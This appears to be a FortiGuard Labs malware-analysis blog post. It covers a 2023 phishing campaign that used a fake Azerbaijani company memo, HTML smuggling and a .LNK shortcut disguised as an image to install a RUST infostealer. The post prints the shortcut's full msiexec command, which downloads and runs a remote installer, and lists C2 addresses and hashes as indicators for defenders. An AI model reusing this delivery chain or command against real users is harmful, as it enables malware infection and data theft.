In 1923, the Soviet Union created the Nagorno-Karabakh Autonomous Oblast (an oblast is an administrative region or province) within the Azerbaijan Soviet Socialist Republic. This oblast has a 95% ethnically Armenian population. In 1988, Nagorno-Karabakh declared its intention to leave Azerbaijan and join the neighboring Republic of Armenia. While the Soviet Union was able to keep the resulting tension under control, once the USSR began to collapse, armed conflict between Azerbaijan and Armenia began for control of the Nagorno-Karabakh region. While a ceasefire was tentatively reached in 1994 and again in 2020, tensions remain high between the two countries.
Figure 1. Regional Map
Affected platforms: Microsoft Windows
Impacted parties: Targeted management associated with an Azerbaijanian company
Impact: Reconnaissance of basic computer info of targeted users
Severity level: Low
In August 2023, FortiGuard Labs discovered an infected memo pretending to come from the current president of a company in Azerbaijan and aimed at the management teams of associated businesses. Opening this memo downloads malware designed to gather basic information from its targets.
Figure 2. Memo
This blog analyzes the attack chain, reviews the malware’s capabilities, and reveals the possible location of the threat actor behind it.
FortiGuard Labs spotted this attack by finding the memo in Figure 2. The memo claims to have information about a border clash between soldiers from Azerbaijan and Armenia.
Figure 3. Attack flow
The memo is in HTML format and uses HTML smuggling to automatically deliver a password-protected archive. This archive, as the memo suggests, contains several images. As shown in the attack diagram in Figure 3, the archive contains three clean images and one phony image. The actual contents are illustrated below.
Figure 4. Contents of the zip archive with parts obfuscated for PII purposes
An astute observer may notice that the first "image" is not an image file. In reality, it is a .LNK shortcut that executes the following command:
..\..\Windows\System32\msiexec.exe /i "https://dl[.]dropboxusercontent[.]com/scl/fi/zjxgh8ofdmfca8bpfntw9/karabakh.jpg.msi? rlkey=nidpjpx3ioigoq6qonibztwg4&dl=0"
This command downloads an .MSI (Microsoft Installer) file. Figure 3 shows this MS installer file performing two actions when clicked. The first action is to display an image with the same filename as the phony image shortcut (shown in the zip archive in Figure 4):
Figure 5. The phony image shown when the .LNK shortcut is executed
This technique may fool some users into thinking the shortcut was simply an image file. But this is misdirection. Instead, the installer simultaneously loads hidden malware into the targeted computer.
The malicious installer creates a new folder in the user’s %APPDATA% folder called “Windows Defender Health Check.” It also installs malware with the same name:
C:\Users\[username]\AppData\Roaming\Windows Defender Health Check\WindowsDefenderHealthcheck.exe
This malware is programmed in RUST, which is not the programming language of choice for most malware authors. This makes using standard analysis tools and methods somewhat less useful. The fact that RUST is used already makes this threat actor different. However, this is not the only trait that makes this malware distinct.
For persistence, a temporary file is created called “24rp.xml.” This file is used to create a scheduled task.
Figure 6. Scheduled task
Once the scheduled task is created, the .XML file is deleted. This technique assumes that the intended targets leave their computers on overnight so the malware can execute outside regular office hours when it is less likely to be noticed. Moreover, for even greater stealth, the malware can sleep for random amounts of time when performing its tasks.
Figure 7. Sleep between 10 and 20 minutes
Next, we will refer back to Figure 2 for another indication of how this malware attempts to stay hidden. Notice the memo is dated August 8th. By examining its compile timestamp, we found that this malware was created the previous day.
Figure 8. Creation time of the malware
This short timeframe makes it virtually impossible to accidentally release the malware before the attack starts.
Ultimately, the malware acts like an infostealer, gathering basic computer information and sending it to a C2 server. The following commands are executed:
Figure 9. Commands executed by the malware
These commands suggest that the threat actor is still in the early stages of attempting to fully compromise its targets. The information being gathered from these commands could be used to tailor specific attacks for each infected target.
This infostealer is unique because it also collects a list of environment variables and takes an extra step to check for any proxy servers in use.
Figure 10. Checking for proxy
Figure 10. Checking for proxy
If a proxy server is set, the malware understands how to route its traffic. The malware issues a POST request to send the encrypted information it stole to a C2 server owned by the threat actor, 78[.]135.73.140, through port 35667.
Our telemetry found nothing too interesting with the C2 server itself. However, digging into the server uncovered additional information. Using data from PDNS and other records, the C2 server 78[.]135.73.140 does not seem to be a shared server. This suggests the threat actor has total control and setup of the server. With this assumption, we searched to discover more of the threat actor’s network infrastructure. Inside the /24 subnet alone, four additional servers were revealed:
Figure 11. Partial network infrastructure
Using the August 8th date on the memo as a starting point, we searched traffic going to these servers in the month prior. While we did not find significant amounts of traffic, we identified one IP address in Colombia that connected to the server 78[.]135.73.188 in July on a port commonly used for VPN for a substantial amount of time. If the threat actor wanted to hide their activity, using a VPN server under their control would accomplish the job. The Colombia IP address belongs to a cellular company, which suggests the user may have been using a mobile hotspot. If so, this may be the location of the attacker.
The threat actor in this campaign uses a few advanced techniques, including RUST and after-hours execution, to help it stay under the radar and make analysis more difficult. The size of the network infrastructure also suggests this threat actor is not a run-of-the-mill malware developer but someone with access to resources. And the use of a geopolitical rule indicates that this threat actor is plugged in and knows how to target specific users.
Fortinet customers are already protected from these malware samples through AntiVirus and FortiEDR services, as follows:
FortiGuard Labs detects the relevant samples with the following AV signatures:
The URLs are rated as “Malicious Websites” by the FortiGuard Web Filtering service.
The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. Fortinet EPP customers running current AntiVirus updates are also protected.
If you believe this or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard Incident Response Team.
2A71BA3FEF819AB9FF3347CF71EEA37766B1E80FDBC1B53C83DD3B19CE71EBFD |
ARMENIAN_ACT_OF_AGGRESSION.pdf.html |
17B3ACB560E979556207B8E7E41A086F6F147381E2FFD1CE672D663A526B1FB5 |
Armenian Aggression.zip |
04725FB5A9E878D68E03176364F3B1057A5C54CCA06EC988013A508D6BB29B42 |
1.KARABAKH.jpg.lnk |
35F2F7CD7945F43D9692B6EA39D82C4FC9B86709B18164AD295CE66AC20FD8E5 |
karabakh.jpg.msi |
5327308FEE51FC6BB95996C4185C4CFCBAC580B747D79363C7CF66505F3FF6DB |
WindowsDefenderHealthcheck.exe |
https://dl[.]dropboxusercontent[.]com/scl/fi/zjxgh8ofdmfca8bpfntw9/karabakh.jpg.msi?rlkey=nidpjpx3ioigoq6qonibztwg4&dl=0 |
78[.]135.73.140 |
78[.]135.73.147 |
78[.]135.73.162 |
78[.]135.73.183 |
78[.]135.73.188 |
Learn more about Fortinet’s FortiGuard Labs threat research and global intelligence organization and Fortinet’s FortiGuard AI-powered Security Services portfolio. Sign up to receive our threat research blogs.